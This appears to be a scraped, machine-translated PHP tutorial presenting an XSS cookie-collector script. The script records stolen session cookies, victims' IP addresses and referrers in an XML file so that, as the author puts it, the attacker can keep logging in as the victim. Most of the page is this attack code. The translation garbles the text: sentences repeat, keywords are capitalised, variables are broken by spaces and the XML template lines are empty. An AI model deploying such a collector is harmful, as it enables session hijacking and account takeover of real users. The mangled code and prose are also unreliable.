Php script _ PHP Tutorial with XSS tool SessionIE

Use the XSS SessionIE php script. What I wrote is purely fun and boring. In the end, it is just an xml operation. The reason is that www.cncert.net released a new xs in our mail list a few days ago. what I wrote was purely fun and boring. In the end, it was just an xml operation. The reason is still due to a few days ago, http://www.cncert.net released a new xss utility in our mail list, similar to the hamster of foreigners, in the client regularly refresh to keep the session does not time out. Once accessed by a cross-site user, the attacker can always log on. This tool uses. net. for convenience, the cookie collection script is required to save the cookie as an xml file. He provided an asp procedure. I only have php space, so I wrote a php program for testing.
Code:

Date_default_timezone_set ("Asia/Chongqing ");

$ My_file = "cookie. xml ";

If (! Isset ($ _ GET [x])
{
Exit;
}

$ My_cookie = $ _ GET [x];
If ($ _ GET [x]! = "")
{
If (! File_exists ($ my_file ))
{
CreateXmlFile ();
}

AddData ($ my_cookie );
}

Function CreateXmlFile ()
{
Global $ my_file;

$ Fp = fopen ($ my_file, "wb ");
If (! $ Fp)
{
Exit;
}

Fwrite ($ fp ," ");
Fwrite ($ fp ," ");
Fwrite ($ fp ," ");
Fwrite ($ fp ," ");
Fwrite ($ fp ," ");

Fclose ($ fp );
}

Function AddData ($ my_cookie)
{
Global $ my_file;

$ Doc = new DOMDocument ();
$ Doc-> load ($ my_file );
$ Doc-> formatOutput = true;

$ Treeroot = $ doc-> getElementsBytagName ("treeroot")-> item (0 );

$ Item = $ doc-> createElement ("item ");
$ Treeroot-> appendChild ($ item );

If (isset ($ _ SERVER ["REMOTE_HOST"])
{
$ Remote_host = $ _ SERVER ["REMOTE_HOST"];
}
Elseif (isset ($ _ SERVER ["REMOTE_ADDR"])
{
$ Remote_host = $ _ SERVER ["REMOTE_ADDR"];
}
Else
{
$ Remote_host = "NotCare ";
}
$ Title = $ doc-> createElement ("title", $ remote_host );
$ Item-> appendChild ($ title );

If (isset ($ _ SERVER ["HTTP_REFERER"])
{
$ Refer = $ _ SERVER ["HTTP_REFERER"];
}
Else
{
$ Refer = "http://yahoo.cn ";
}
$ Link = $ doc-> createElement ("link", $ refer );
$ Item-> appendChild ($ link );

$ Src_ip = $ doc-> createElement ("src_ip", $ _ SERVER ["REMOTE_ADDR"]);
$ Item-> appendChild ($ src_ip );

$ Src_ OS = $ doc-> createElement ("src_ OS", "NotCare ");
$ Item-> appendChild ($ src_ OS );

$ PubDate = $ doc-> createElement ("pubDate", date ("r "));
$ Item-> appendChild ($ pubDate );

$ Description = $ doc-> createElement ("description", $ my_cookie );
$ Item-> appendChild ($ description );

$ Doc-> save ($ my_file );
}

?>

Bytes. The reason is that the http://www.cncert.net released a new xs in our mail list a few days ago...